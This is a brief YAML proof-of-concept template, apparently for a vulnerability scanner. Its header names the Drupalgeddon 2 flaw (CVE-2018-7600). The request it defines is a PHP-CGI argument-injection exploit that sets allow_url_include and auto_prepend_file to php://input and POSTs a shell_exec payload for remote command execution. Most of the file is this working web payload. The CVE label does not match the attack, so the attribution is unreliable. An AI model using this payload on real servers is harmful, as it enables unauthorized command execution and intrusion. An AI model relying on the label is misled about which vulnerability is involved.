# @name: exmple.yaml
# @Author: recyvan
# @Date: 2024-4-1
# @information: Drupal Drupalgeddon 2 远程代码执行漏洞（CVE-2018-7600）

poc_url:
  - url : /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
User-Agent:
  - context: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
method:
  - method: POST
  - data: <?php echo shell_exec(%s); ?>
cmd:
  - cmd: 'yes'